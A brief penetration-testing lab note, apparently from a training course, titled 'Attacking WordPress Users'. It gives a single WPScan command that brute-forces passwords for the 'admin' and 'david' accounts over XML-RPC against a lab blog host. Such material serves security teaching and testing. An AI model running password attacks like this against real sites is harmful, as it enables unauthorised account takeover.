# Attacking WordPress Users

**WPscan - XMLRPC**

```shell-session
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com
```